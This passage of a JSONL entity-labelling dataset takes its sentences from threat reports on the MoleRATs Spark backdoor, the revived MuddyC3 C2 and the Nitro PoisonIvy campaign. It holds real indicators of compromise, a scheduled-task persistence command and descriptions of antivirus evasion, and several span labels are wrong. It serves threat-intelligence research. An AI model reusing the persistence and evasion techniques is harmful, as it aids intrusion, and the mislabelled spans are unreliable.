MoleRATs most prominently targets Palestinian territories , its spear phishing attacks often use attached 
malicious documents on topical Palestinian Authority-related issues to lure their victims .", "spans": [{"start": 3, "end": 11, "label": "Organization"}]} {"text": "The group uses a mix of tools and malware , some developed by the group and others that are more generic tools .", "spans": []} {"text": "Gaza Cybergang Group 2 , also dubbed Desert Falcons , APT-C-23 , Arid Viper .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 37, "end": 51, "label": "Organization"}, {"start": 54, "end": 62, "label": "Organization"}, {"start": 65, "end": 75, "label": "Organization"}]} {"text": "This second group is an Arabic-speaking group that mainly targets the Middle East and North Africa , with a few targets in European and Asian countries as well .", "spans": []} {"text": "The group is known for their advanced attacks that leverage custom-built Windows malware ( Kasperagent , Micropsia ) as well as Android malware ( Vamp , GnatSpy ) .", "spans": [{"start": 73, "end": 80, "label": "System"}, {"start": 91, "end": 102, "label": "Malware"}, {"start": 105, "end": 114, "label": "Malware"}, {"start": 128, "end": 135, "label": "System"}, {"start": 146, "end": 150, "label": "Malware"}, {"start": 153, "end": 160, "label": "Malware"}]} {"text": "Gaza Cybergang Group 3: This group is believed to be behind Operation Parliament .", "spans": [{"start": 0, "end": 14, "label": "Organization"}]} {"text": "It is considered to be the most advanced group of the three , and is focused on high-profile targets in the Middle East , North America , Europe and Asia .", "spans": []} {"text": "The group is reported to have previously attacked government institutions , parliaments , senates , diplomatic functions , and even Olympic and other sports bodies .", "spans": []} {"text": "It is important to remember there are many threat actors operating in the Middle East , and often there are overlaps in TTPs , tools , motivation , and victimology .", "spans": []} {"text": "There have been 
cases in the past where a threat actor attempted to mimic another to thwart attribution efforts , and as such , attribution should rarely be taken as is , but instead with a grain of salt and critical thinking .", "spans": []} {"text": "In this attack , the targets are lured to open a document or a link attached to an email .", "spans": [{"start": 83, "end": 88, "label": "System"}]} {"text": "There have been cases in the past where victims also downloaded malicious content from fake news websites .", "spans": []} {"text": "The names of the files and their content play a major part in luring victims to open them , as they usually relate to current topics pertaining to Hamas , the Palestinian National Authority , or other recent events in the Middle East .", "spans": [{"start": 147, "end": 152, "label": "Organization"}]} {"text": "The lure documents analyzed by Cybereason in this attack concentrate on the following themes :", "spans": [{"start": 31, "end": 41, "label": "Organization"}]} {"text": "The Conflict between Hamas and Fatah : The historical rivalry between the Hamas and Fatah has resulted in many open battles between the two entities .", "spans": [{"start": 21, "end": 26, "label": "Organization"}, {"start": 31, "end": 36, "label": "Organization"}, {"start": 74, "end": 79, "label": "Organization"}, {"start": 84, "end": 89, "label": "Organization"}]} {"text": "Since 2006 , Hamas has controlled the Gaza strip and Fatah has controlled the West Bank .", "spans": [{"start": 13, "end": 18, "label": "Organization"}, {"start": 38, "end": 42, "label": "Organization"}, {"start": 53, "end": 58, "label": "Organization"}]} {"text": "Matters pertaining to the Israeli-Palestinian Conflict : Some of the documents in this campaign reference different aspects of the Israeli-Palestinian conflict , and the efforts for ceasefire and peace processes between the Israelis and the Palestinians , including the latest peace plan made by President Donald Trump and Senior Advisor to the 
President of the United States Jared Kushner .", "spans": []} {"text": "Vigilance Following Soleimani \u2019s Assassination : One of the lure documents mentions sources in Lebanon that report a state of alert and vigilance amongst Iranian , Syrian , and Lebanese militias following Soleimani \u2019s assassination .", "spans": []} {"text": "Tensions Between Hamas and the Egyptian Government : Egypt plays a major role as a mediator in the Israeli-Palestinian conflict and has brokered several ceasefire deals and other negotiations in the past .", "spans": [{"start": 17, "end": 22, "label": "Organization"}]} {"text": "Changes to Egypt \u2019s internal political climate are known to have affected Egyptian government relations with Hamas over the years .", "spans": [{"start": 109, "end": 114, "label": "Organization"}]} {"text": "It was recently reported that Ismail Haniyeh , the head of Hamas \u2019 political Bureau , had a falling-out with the Egyptian government over his visit to Tehran to participate in General Qasem Soleimani \u2019s funeral , following Soleimani \u2019s assassination .", "spans": [{"start": 59, "end": 64, "label": "Organization"}]} {"text": "In the Spark campaign , the lure documents and links point to one of two file sharing websites , Egnyte or Dropbox .", "spans": [{"start": 7, "end": 12, "label": "Malware"}, {"start": 97, "end": 103, "label": "System"}, {"start": 107, "end": 114, "label": "System"}]} {"text": "The target is encouraged to download an archive file in a rar or zip format that contains an executable file masquerading as a Microsoft Word document .", "spans": [{"start": 58, "end": 61, "label": "System"}, {"start": 65, "end": 68, "label": "System"}, {"start": 127, "end": 136, "label": "Organization"}, {"start": 137, "end": 141, "label": "System"}]} {"text": "One example of a lure document used in the Spark campaign is a PDF file that is used to deliver the Spark backdoor to the victim .", "spans": [{"start": 43, "end": 48, "label": 
"Malware"}, {"start": 63, "end": 66, "label": "System"}, {"start": 100, "end": 114, "label": "Malware"}]} {"text": "The document includes a special report allegedly quoted from the Egyptian newspaper Al-Ahram .", "spans": [{"start": 84, "end": 92, "label": "Organization"}]} {"text": "This document reports that Ismail Haniyeh , the political leader of Hamas , had notified the Egyptian government that he will remain abroad after his visit to Tehran to take part in Soleimani \u2019s funeral , which sparked tension with the Egyptian authorities .", "spans": []} {"text": "Haniyeh_will_remain_abroad_and_Hamas_rises_in_Gaza.pdf : 5b476e05aacea9edc14f7e4bab1b724ef54915f30c39ac87503ed395feae611e .", "spans": [{"start": 0, "end": 54, "label": "Indicator"}, {"start": 57, "end": 121, "label": "Indicator"}]} {"text": "The target is encouraged to click on the link to read the entire article .", "spans": []} {"text": "However , the document does not link to the Egyptian Newspaper website , but instead to a file sharing website called Egnyte .", "spans": [{"start": 118, "end": 124, "label": "System"}]} {"text": "It prompts the user to download a file that supposedly contains the full article .", "spans": []} {"text": "Link embedded in the PDF document : https://csaasd.egnyte.com/dd/h5s7YHzOy5 .", "spans": [{"start": 21, "end": 24, "label": "System"}, {"start": 36, "end": 75, "label": "Indicator"}]} {"text": "The downloaded file is an archive file ( .r23 ) , that contains a Windows executable file with the same name as the PDF and with a fake Microsoft Word icon .", "spans": [{"start": 41, "end": 45, "label": "Indicator"}, {"start": 66, "end": 73, "label": "System"}, {"start": 116, "end": 119, "label": "System"}, {"start": 136, "end": 145, "label": "Organization"}, {"start": 146, "end": 150, "label": "System"}]} {"text": "Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.r23 :", "spans": [{"start": 0, "end": 56, "label": "Indicator"}]} {"text": 
"e8d73a94d8ff18c7791bf4547bc4ee2d3f62082c594d3c3cf7d640f7bbd15614 .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]} {"text": "Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.exe :", "spans": [{"start": 0, "end": 56, "label": "Indicator"}]} {"text": "7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128 .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]} {"text": "When the victim double clicks on the executable file , it unpacks and installs the Spark backdoor , as shown in the attack tree screenshot below .", "spans": [{"start": 83, "end": 97, "label": "Malware"}]} {"text": "The extracted executable file contains a compiled Autoit script , which can be seen in the RT_RCDATA section of the file .", "spans": [{"start": 50, "end": 56, "label": "System"}]} {"text": "The decompiled code shows the decryption routine that unpacks the embedded Spark backdoor .", "spans": [{"start": 75, "end": 89, "label": "Malware"}]} {"text": "Once the file is unpacked , the backdoor is dropped in two different locations on the infected operating system :", "spans": []} {"text": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\runawy.exe .", "spans": [{"start": 0, "end": 86, "label": "Indicator"}]} {"text": "C:\\Users\\user\\runawy.exe .", "spans": [{"start": 0, "end": 24, "label": "Indicator"}]} {"text": "In addition , the Autoit code also creates the following scheduled task for persistence :", "spans": []} {"text": "SCHTASKS /Create /f /SC minute /TN runawy /mo 5 /tr C:\\Users\\\\runawy.exe .", "spans": [{"start": 52, "end": 78, "label": "Indicator"}]} {"text": "Urgent_Information_Report.exe :", "spans": [{"start": 0, "end": 29, "label": "Indicator"}]} {"text": "6e896099a3ceb563f43f49a255672cfd14d88799f29617aa362ecd2128446a47 .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]} {"text": "The executable has a Microsoft Word icon to trick victims into believing they are opening a Word document .", 
"spans": [{"start": 21, "end": 30, "label": "Organization"}, {"start": 31, "end": 35, "label": "System"}, {"start": 92, "end": 96, "label": "System"}]} {"text": "Once the user double-clicks on the executable file , the dropper drops a Word document in %AppData% and displays the following decoy document to the victim , while the dropper runs in the background and installs the backdoor . %appdata%\\info.docx :", "spans": [{"start": 73, "end": 77, "label": "System"}, {"start": 227, "end": 246, "label": "Indicator"}]} {"text": "2c50eedc260c82dc176447aa4116ad37112864f4e1e3e95c4817499d9f18a90d .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]} {"text": "The dropper drops the Spark backdoor binary and a shortcut file used to initiate persistence in the following locations .", "spans": [{"start": 22, "end": 36, "label": "Malware"}]} {"text": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Blaster.lnk :", "spans": [{"start": 0, "end": 87, "label": "Indicator"}]} {"text": "4254dc8c368cbc36c8a11035dcd0f4b05d587807fa9194d58f0ba411bfd65842 .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]} {"text": "C:\\Users\\user\\AppData\\Roaming\\Blaster.exe :", "spans": [{"start": 0, "end": 41, "label": "Indicator"}]} {"text": "cf32479ed30ae959c4ec8a286bb039425d174062b26054c80572b4625646c551 .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]} {"text": "The Spark payload is a custom backdoor likely developed by the MoleRATs group .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 63, "end": 71, "label": "Organization"}]} {"text": "In addition to known generic malware ( such as : njRAT , Poison Ivy , XtremeRAT ) , the MoleRATs group has been known to develop its own custom tools such as DustySky , the MoleRAT Loader and Scote .", "spans": [{"start": 49, "end": 54, "label": "Malware"}, {"start": 57, "end": 67, "label": "Malware"}, {"start": 70, "end": 79, "label": "Malware"}, {"start": 88, "end": 96, 
"label": "Organization"}, {"start": 158, "end": 166, "label": "Malware"}, {"start": 173, "end": 180, "label": "Malware"}, {"start": 192, "end": 197, "label": "Malware"}]} {"text": "We believe this backdoor is relatively new and seems to have appeared starting in the beginning of 2019 .", "spans": []} {"text": "The name Spark is derived from the PDB path left in a few of the backdoor binaries :", "spans": [{"start": 9, "end": 14, "label": "Malware"}, {"start": 35, "end": 38, "label": "System"}]} {"text": "W:\\Visual Studio 2017\\Spark4.2\\Release\\Spark4.2.pdb .", "spans": [{"start": 0, "end": 51, "label": "Indicator"}]} {"text": "The Spark backdoor allows the attackers to :", "spans": [{"start": 4, "end": 18, "label": "Malware"}]} {"text": "Collect information about the infected machine .", "spans": []} {"text": "Encrypt the collected data and send it to the attackers over the HTTP protocol .", "spans": [{"start": 65, "end": 69, "label": "Indicator"}]} {"text": "Download additional payloads .", "spans": []} {"text": "Log keystrokes .", "spans": []} {"text": "Record audio using the computer \u2019s microphone .", "spans": []} {"text": "Execute commands on the infected machine .", "spans": []} {"text": "The creators of the Spark backdoor use a few techniques that are intended to keep the backdoor under-the-radar , including :", "spans": [{"start": 20, "end": 34, "label": "Malware"}]} {"text": "Packing the payloads with the Enigma packer .", "spans": [{"start": 30, "end": 36, "label": "System"}]} {"text": "Checking for antivirus and other security products using WMI .", "spans": [{"start": 57, "end": 60, "label": "System"}]} {"text": "Validating Arabic keyboard and language settings on the infected machine .", "spans": []} {"text": "All the the payloads observed by Cybereason in this campaign were packed by a powerful yet commercial packer called Enigma Packer .", "spans": [{"start": 33, "end": 43, "label": "Organization"}, {"start": 116, "end": 122, "label": 
"System"}]} {"text": "The MoleRATs group have been known to use this packer in previous attacks .", "spans": [{"start": 4, "end": 12, "label": "Organization"}]} {"text": "Enigma packer artifacts in file metadata ( SHA-256: b08b8fddb9dd940a8ab91c9cb29db9bb611a5c533c9489fb99e36c43b4df1eca ) .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 52, "end": 116, "label": "Indicator"}]} {"text": "One common evasive mechanism used by the Spark backdoor is its ability to check for installed security products using WMI queries ( WQL ) .", "spans": [{"start": 41, "end": 55, "label": "Malware"}, {"start": 118, "end": 121, "label": "System"}]} {"text": "If certain security products are installed , the backdoor does not carry out its malicious activity .", "spans": []} {"text": "Another evasive mechanism used by the backdoor is how it checks whether an Arabic keyboard and Arabic language settings are used on the infected machine .", "spans": []} {"text": "If Arabic keyboard and language settings are not found on the machine , the backdoor will not carry out its malicious activity .", "spans": []} {"text": "This check serves two purposes :", "spans": []} {"text": "It minimizes the risk of overexposure by specifically targeting Arabic speakers .", "spans": []} {"text": "It can thwart detection by automated analysis engines and sandbox solutions .", "spans": []} {"text": "After unpacking itself , the Spark backdoor creates a hidden window where most of the malicious activity is handled .", "spans": [{"start": 29, "end": 43, "label": "Malware"}, {"start": 61, "end": 67, "label": "System"}]} {"text": "This behavior can be detected using a tool called WinLister , which enumerates hidden windows .", "spans": [{"start": 50, "end": 59, "label": "System"}, {"start": 86, "end": 93, "label": "System"}]} {"text": "The name of the window is Spark4.2 .", "spans": [{"start": 26, "end": 34, "label": "Malware"}]} {"text": "The Spark backdoor communicates with the C2 servers over the 
HTTP protocol .", "spans": [{"start": 4, "end": 18, "label": "Malware"}, {"start": 41, "end": 43, "label": "System"}, {"start": 61, "end": 65, "label": "Indicator"}]} {"text": "The data is first encrypted and then encoded with Base64 .", "spans": []} {"text": "In this instance , the backdoor posts the data to the domain Nysura.com ( For more domains , please see the IOC section of this research ) .", "spans": [{"start": 61, "end": 71, "label": "Indicator"}]} {"text": "It is interesting to see that the HTTP POST host header refers to a legitimate domain cnet.com , however , in actuality , the data is sent to nysura.com , as can be seen in the traffic screenshot below .", "spans": [{"start": 34, "end": 38, "label": "Indicator"}, {"start": 86, "end": 94, "label": "Indicator"}, {"start": 142, "end": 152, "label": "Indicator"}]} {"text": "The data sent to the C2 follows a structured pattern that uses a predefined keywords array , where each keyword is mapped to a certain subroutine .", "spans": [{"start": 21, "end": 23, "label": "System"}]} {"text": "The keywords are comprised of the names of individuals .", "spans": []} {"text": "They are mostly Western names , but there were some Arabic names in a few of the samples .", "spans": []} {"text": "Prior to sending the data to the server , the data is encrypted and staged in an array like this :", "spans": []} {"text": "[27089,28618,9833,4170,25722,19977,2369,21426,3435,7442,30146,21719,16140,16280,16688,22550,19867,194,3298] .", "spans": []} {"text": "The data is then encoded with Base64 :", "spans": []} {"text": "\" WzI3MDg5LDI4NjE4LDk4MzMsNDE3MCwyNTcyMiwxOTk3NywyMzY5LDIxNDI2LDM0MzUsNzQ0MiwzMDE0NiwyMTcxOSwxNjE0MCwxNjI4MCwxNjY4OCwyMjU1MCwxOTg2NywxOTQsMzI5OF0= \" .", "spans": []} {"text": "The Base64-encoded data is inserted into the following json object , which contains the individual names .", "spans": []} {"text": "Lastly , the entire json object is encoded with Base64 and undergoes another stage of encryption , and 
then sent to the server :", "spans": []} {"text": "\" ZjRTc1dTTU9nVW5FaXM3bGgvbU90MTlVMHFkb1c5SFFuRXhhSVR5YytIQkZremk3bk5wY21BUEZRYitJenA1cnlJY1lxREJJZ1RrL0N4UzZWcVVQM0pTUWFISlhKWG8wN1BxWE1hYThHSUdEVnBFakYrNlp1bXBvdUZMRFNYQVhxYk9tSElWYTFOTlpJK0hFVVBmTG9CQUV3VCtqQ2FCVUE1aHQ2SzllSHREMUpOdkdBUXZ3TWgyLzhtVHpha2I0TE81ZlpURTQyUmVjdFY1M0ZpemlRR1FLL1gzNE9mcU0zR0JqQ1ZnN1hCSmFGaC94RHBDMkNBRmZaSTVoVlhsaTBtQW5SR3N5QzVRY2lMNkpZVFJuRTQrUzBjdjU4SjY4ejRCL2FNbW9IakRheHdQd1RPUElkOHNDbDRVbmp2ZDM0ZVZlZTB1QVA0UHo0YllyVHRMZVRnPT0= \" .", "spans": []} {"text": "Using names as keywords is an identical technique to that of the data structure logic previously documented by 360 \u2019s blog post .", "spans": [{"start": 111, "end": 114, "label": "Organization"}]} {"text": "This post discusses an earlier variant of the backdoor attributed to the MoleRATs group .", "spans": [{"start": 73, "end": 81, "label": "Organization"}]} {"text": "Using other individuals names for C2 communication has also been done by the two other Gaza Cybergang groups :", "spans": [{"start": 34, "end": 36, "label": "System"}]} {"text": "Gaza Cybergang Group 2 with the Micropsia backdoor :", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 32, "end": 50, "label": "Malware"}]} {"text": "In this instance , the C2 communication implemented by the Micropsia backdoor also used specific names for different C2 commands .", "spans": [{"start": 23, "end": 25, "label": "System"}, {"start": 59, "end": 77, "label": "Malware"}, {"start": 117, "end": 119, "label": "System"}]} {"text": "Gaza Cybergang Group 3 in Operation Parliament : In this instance , the malware also used people \u2019s names for C2 communication to send and receive commands from the server .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 110, "end": 112, "label": "System"}]} {"text": "Based on the similarity of the naming convention and data format , we believe the Spark backdoor could be an evolution of the backdoor 
mentioned in Operation Parliament , or at least inspired by the malware .", "spans": [{"start": 82, "end": 96, "label": "Malware"}]} {"text": "The Spark campaign detailed in this blog demonstrates how the tense geopolitical climate in the Middle East is used by threat actors to lure victims and infect them with the Spark backdoor for cyber espionage purposes .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 174, "end": 188, "label": "Malware"}]} {"text": "The names of the files and decoy content seem to be carefully crafted , often referencing controversial and topical political issues .", "spans": []} {"text": "Cybereason estimates that the files are specifically meant to lure and appeal to victims from the Middle East , especially towards individuals and entities in the Palestinian territories likely related to the Palestinian government or the Fatah movement .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 98, "end": 109, "label": "Malware"}]} {"text": "The techniques , tools , and procedures used in this campaign bear great resemblance to previous attacks attributed to the MoleRATs Group ( aka Gaza Cybergang Group ) , an Arabic-speaking , politically motivated group that has operated in the Middle East since 2012 .", "spans": [{"start": 123, "end": 131, "label": "Organization"}, {"start": 144, "end": 158, "label": "Organization"}]} {"text": "Our research demonstrates the efforts used by attackers to reduce the risk of detection of the Spark backdoor by various security products .", "spans": [{"start": 95, "end": 109, "label": "Malware"}]} {"text": "The backdoor checks for the existence of antivirus and firewall products before it initiates its malicious activity .", "spans": []} {"text": "Importantly , the backdoor simply will not reveal its malicious nature unless Arabic language keyboard and settings are found on the infected machine .", "spans": []} {"text": "This shows how the attackers use this backdoor in a 
surgical way to exclusively attack specific targets .", "spans": []} {"text": "In addition , analysis of these backdoor delivery methods also highlights a trend by many threat actors where they use legitimate storage platforms to deliver the initial stages of the attack .", "spans": []} {"text": "Reviving MuddyC3 Used by MuddyWater ( IRAN ) APT .", "spans": [{"start": 9, "end": 16, "label": "System"}, {"start": 25, "end": 35, "label": "Organization"}, {"start": 38, "end": 42, "label": "Organization"}]} {"text": "MuddyWater is a well-known threat actor group founded by Iran that has been active since 2017 .", "spans": [{"start": 0, "end": 10, "label": "Organization"}]} {"text": "They target groups across Middle East and Central Asia , primarily using spear phishing emails with malicious attachments .", "spans": [{"start": 88, "end": 94, "label": "System"}]} {"text": "Most recently they were connected to a campaign in March that targeted organizations in Turkey , Pakistan , and Tajikistan .", "spans": []} {"text": "MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call \u201c POWERSTATS \u201d .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 69, "end": 85, "label": "System"}, {"start": 117, "end": 127, "label": "Malware"}]} {"text": "Despite broad scrutiny and reports on MuddyWater attacks , the activity continues with only incremental changes to the tools and techniques .", "spans": [{"start": 38, "end": 48, "label": "Organization"}]} {"text": "On June 26 2019 a group called \u201c Green Leakers \u201d on Telegram published screenshots of the C2 admin panel as you can see below along with screenshot of the muddyc3 c2 source code . 
They announced that they are selling all the leaked tools for 0.5BTC .", "spans": [{"start": 33, "end": 46, "label": "Organization"}, {"start": 90, "end": 92, "label": "System"}, {"start": 155, "end": 162, "label": "System"}, {"start": 163, "end": 165, "label": "System"}]} {"text": "At that time I got the source code from GitHub , so I tried the code to find that the core of the c2 which is powershell payload is missing ( the leaker didn\u2019t include the payload in order to by all the tools ) . So I didn\u2019t have time to reverse engineer the source code and I left it . Last week I got 3 days off from my work ( working in SOC will keep you for ever busy ) so I started analyzing the code which will be discussed below and I was able to understand how it works in order to create the missing powershell payload and make the c2 come to life .", "spans": [{"start": 40, "end": 46, "label": "System"}, {"start": 98, "end": 100, "label": "System"}, {"start": 110, "end": 120, "label": "System"}, {"start": 340, "end": 343, "label": "System"}, {"start": 509, "end": 519, "label": "System"}, {"start": 541, "end": 543, "label": "System"}]} {"text": "I didn\u2019t just revive the C2 but also added more advanced functionality which will be released as separate tool soon .", "spans": [{"start": 25, "end": 27, "label": "System"}]} {"text": "Lets start by giving a summary about the muddyc3 tool :", "spans": [{"start": 41, "end": 48, "label": "System"}]} {"text": "Coded with python2.7 . Works as C2 server that serve a powershell agent script when requested . I didn\u2019t find any function to encrypt the traffic between the the agent and the C2 but there are variables with name private_key , public_key so I suspect the functions removed . 
It makes use of HTA and bas64 encoded powershell code to bypass the AV ( right now AV can catch HTA ) .", "spans": [{"start": 11, "end": 20, "label": "System"}, {"start": 32, "end": 34, "label": "System"}, {"start": 55, "end": 65, "label": "System"}, {"start": 176, "end": 178, "label": "System"}, {"start": 291, "end": 294, "label": "System"}, {"start": 313, "end": 323, "label": "System"}, {"start": 343, "end": 345, "label": "System"}, {"start": 358, "end": 360, "label": "System"}, {"start": 371, "end": 374, "label": "System"}]} {"text": "It use threading so many agent can connect and controlled at the same time . The agent must collect information about the system when it first start then report it to the C2 . There is template for agent which will be filled with ip and port when the C2 run . include functions but not all implemented in the initial POC :", "spans": [{"start": 171, "end": 173, "label": "System"}, {"start": 251, "end": 253, "label": "System"}, {"start": 317, "end": 320, "label": "System"}]} {"text": "upload , download , load modules , get screenshot .", "spans": []} {"text": "The initial powershell agent POC I created can bypass the AV including Kaspersky , Trendmicro .", "spans": [{"start": 12, "end": 22, "label": "System"}, {"start": 29, "end": 32, "label": "System"}, {"start": 58, "end": 60, "label": "System"}, {"start": 71, "end": 80, "label": "System"}, {"start": 83, "end": 93, "label": "System"}]} {"text": "Now we dig deep in the C2 to explain how it work and how I created the agent based on the function available in the C2 .", "spans": [{"start": 23, "end": 25, "label": "System"}, {"start": 116, "end": 118, "label": "System"}]} {"text": "C2 interface", "spans": [{"start": 0, "end": 2, "label": "System"}]} {"text": ":", "spans": []} {"text": "Simple CLI interface that ask when started for IP ,Port and proxy configuration to generate the initial payloads .", "spans": [{"start": 7, "end": 10, "label": "System"}]} {"text": "The Nitro Attacks .", 
"spans": [{"start": 4, "end": 9, "label": "Organization"}]} {"text": "This document discusses a recent targeted attack campaign directed primarily at private companies involved in the research , development , and manufacture of chemicals and advanced materials .", "spans": []} {"text": "The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes .", "spans": []} {"text": "In addition , the same attackers appear to have a lengthy operation history including attacks on other industries and organizations .", "spans": []} {"text": "Attacks on the chemical industry are merely their latest attack wave .", "spans": []} {"text": "As part of our investigations , we were also able to identify and contact one of the attackers to try and gain insights into the motivations behind these attacks .", "spans": []} {"text": "As the pattern of chemical industry targets emerged , we internally code-named the attack campaign Nitro .", "spans": [{"start": 99, "end": 104, "label": "Organization"}]} {"text": "The attack wave started in late July 2011 and continued into mid-September 2011 .", "spans": []} {"text": "However , artifacts of the attack wave such as Command and Control ( C&C ) servers are also used as early as April 2011 and against targets outside the chemical industry .", "spans": [{"start": 47, "end": 66, "label": "System"}, {"start": 69, "end": 72, "label": "System"}]} {"text": "The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage .", "spans": []} {"text": "The attackers first researched desired targets and then sent an email specifically to the target .", "spans": [{"start": 64, "end": 69, "label": "System"}]} {"text": "Each organization typically only saw a handful of employees at the receiving end of these emails .", "spans": [{"start": 90, "end": 96, "label": "System"}]} {"text": "However , in one organization almost 500 
recipients received a mail , while in two other organizations , more than 100 were selected .", "spans": []} {"text": "While the attackers used different pretexts when sending these malicious emails , two methodologies stood out .", "spans": [{"start": 73, "end": 79, "label": "System"}]} {"text": "First , when a specific recipient was targeted , the mails often purported to be meeting invitations from established business partners .", "spans": []} {"text": "Secondly , when the emails were being sent to a broad set of recipients , the mails purported to be a necessary security update .", "spans": [{"start": 20, "end": 26, "label": "System"}]} {"text": "The emails then contained an attachment that was either an executable that appeared to be a text file based on the file name and icon , or a password-protected archive containing an executable file with the password provided in the email .", "spans": [{"start": 4, "end": 10, "label": "System"}, {"start": 232, "end": 237, "label": "System"}]} {"text": "In both cases , the executable file was a self-extracting executable containing PoisonIvy , a common backdoor Trojan developed by a Chinese speaker .", "spans": [{"start": 80, "end": 89, "label": "Malware"}, {"start": 110, "end": 116, "label": "Malware"}]} {"text": "When the recipient attempted to open the attachment , they would inadvertently execute the file , causing PoisonIvy to be installed .", "spans": [{"start": 106, "end": 115, "label": "Malware"}]} {"text": "Once PoisonIvy was installed , it contacted a C&C server on TCP port 80 using an encrypted communication protocol .", "spans": [{"start": 5, "end": 14, "label": "Malware"}, {"start": 46, "end": 49, "label": "System"}, {"start": 60, "end": 63, "label": "Indicator"}]} {"text": "Using the C&C server , the attackers then instructed the compromised computer to provide the infected computer \u2019s IP address , the names of all other computers in the workgroup or domain , and dumps of Windows cached password 
hashes .", "spans": [{"start": 10, "end": 13, "label": "System"}, {"start": 202, "end": 209, "label": "System"}]} {"text": "By using access to additional computers through the currently logged on user or cracked passwords through dumped hashes , the attackers then began traversing the network infecting additional computers .", "spans": []} {"text": "Typically , their primary goal is to obtain domain administrator credentials and/or gain access to a system storing intellectual property .", "spans": []} {"text": "Domain administrator credentials make it easier for the attacker to find servers hosting the desired intellectual property and gain access to the sensitive materials .", "spans": []} {"text": "The attackers may have also downloaded and installed additional tools to penetrate the network further .", "spans": []} {"text": "While the behavior of the attackers differs slightly in each compromise , generally once the attackers have identified the desired intellectual property , they copy the content to archives on internal systems they use as internal staging servers .", "spans": []} {"text": "This content is then uploaded to a remote site outside of the compromised organization completing the attack .", "spans": []} {"text": "The majority of infected machines are located in the US , Bangladesh and the UK ;", "spans": []} {"text": "however , overall there is wide geographical spread of infections .", "spans": []} {"text": "As mentioned above , the threat used to compromise the targeted networks is Poison Ivy , a Remote Access Tool ( RAT ) .", "spans": [{"start": 76, "end": 86, "label": "Malware"}]} {"text": "This application is freely available from poisonivy-rat.com .", "spans": [{"start": 42, "end": 59, "label": "Indicator"}]} {"text": "It comes fully loaded with a number of plug-ins to give an attacker complete control of the compromised computer .", "spans": []} {"text": "The method of delivery has changed over time as the attackers have changed targets .", 
"spans": []} {"text": "Older attacks involved a self-extracting archive with a suggestive name , for example : \u201c Human right report of north Africa under the war . scr \u201d .", "spans": []} {"text": "The most recent attacks focusing on the chemical industry are using password-protected 7zip files which , when extracted , contain a self-extracting executable .", "spans": [{"start": 87, "end": 91, "label": "System"}]} {"text": "The password to extract the 7zip file is included in the email .", "spans": [{"start": 28, "end": 32, "label": "System"}, {"start": 57, "end": 62, "label": "System"}]} {"text": "This extra stage is used to prevent automated systems from extracting the self-extracting archive .", "spans": []} {"text": "Some example file names using this technique include : AntiVirus_update_package.7z , acquisition.7z , offer.7z , update_flashplayer10ax.7z .", "spans": [{"start": 55, "end": 82, "label": "Indicator"}, {"start": 85, "end": 99, "label": "Indicator"}, {"start": 102, "end": 110, "label": "Indicator"}, {"start": 113, "end": 138, "label": "Indicator"}]} {"text": "When the self-extracting archive file is executed , it will drop two files .", "spans": []} {"text": "Examples of file names that are used include : %Temp%\\happiness.txt , %Temp%\\xxxx.exe .", "spans": [{"start": 47, "end": 67, "label": "Indicator"}, {"start": 70, "end": 85, "label": "Indicator"}]} {"text": "The executable file , xxxx.exe in this case , is then executed .", "spans": [{"start": 22, "end": 30, "label": "Indicator"}]} {"text": "The second file , happiness.txt , contains custom code in binary format that is encrypted and used by xxxx.exe .", "spans": [{"start": 18, "end": 31, "label": "Indicator"}, {"start": 102, "end": 110, "label": "Indicator"}]} {"text": "The xxxx.exe file copies happiness.txt to C:\\PROGRAM FILES\\common files\\ODBC\\ODUBC.DLL and to C:\\WINDOWS\\system32\\jql.sys .", "spans": [{"start": 4, "end": 12, "label": "Indicator"}, {"start": 25, "end": 38, 
"label": "Indicator"}, {"start": 42, "end": 86, "label": "Indicator"}, {"start": 94, "end": 121, "label": "Indicator"}]} {"text": "It then loads the contents of the encrypted file and injects it into the explorer.exe and iexplore.exe processes .", "spans": [{"start": 73, "end": 85, "label": "Indicator"}, {"start": 90, "end": 102, "label": "Indicator"}]} {"text": "The injected code copies xxxx.exe to %System%\\winsys.exe and connects to the Command and Control ( C&C ) server on TCP port 80 .", "spans": [{"start": 25, "end": 33, "label": "Indicator"}, {"start": 37, "end": 56, "label": "Indicator"}, {"start": 77, "end": 96, "label": "System"}, {"start": 99, "end": 102, "label": "System"}, {"start": 115, "end": 118, "label": "Indicator"}]} {"text": "The communication with the server is a handshake using an encryption algorithm ( Camellia ) .", "spans": []} {"text": "Once the Trojan establishes the server \u2019s authenticity , it expects a variable-size block of binary code that is read from the server straight into the virtual space for iexplore.exe and then executed .", "spans": [{"start": 9, "end": 15, "label": "Malware"}, {"start": 170, "end": 182, "label": "Indicator"}]} {"text": "When executed , the Poison Ivy threat , or Backdoor.Odivy , connects to a command and control ( C&C ) server over TCP port 80 .", "spans": [{"start": 20, "end": 30, "label": "Malware"}, {"start": 43, "end": 57, "label": "Indicator"}, {"start": 74, "end": 93, "label": "System"}, {"start": 96, "end": 99, "label": "System"}, {"start": 114, "end": 117, "label": "Indicator"}]} {"text": "A number of different C&C domains and IP addresses were identified .", "spans": [{"start": 22, "end": 25, "label": "System"}]} {"text": "The majority of samples connect to a domain ; however one subset of samples connected directly to the IP address 204.74.215.58 , which belonged to the 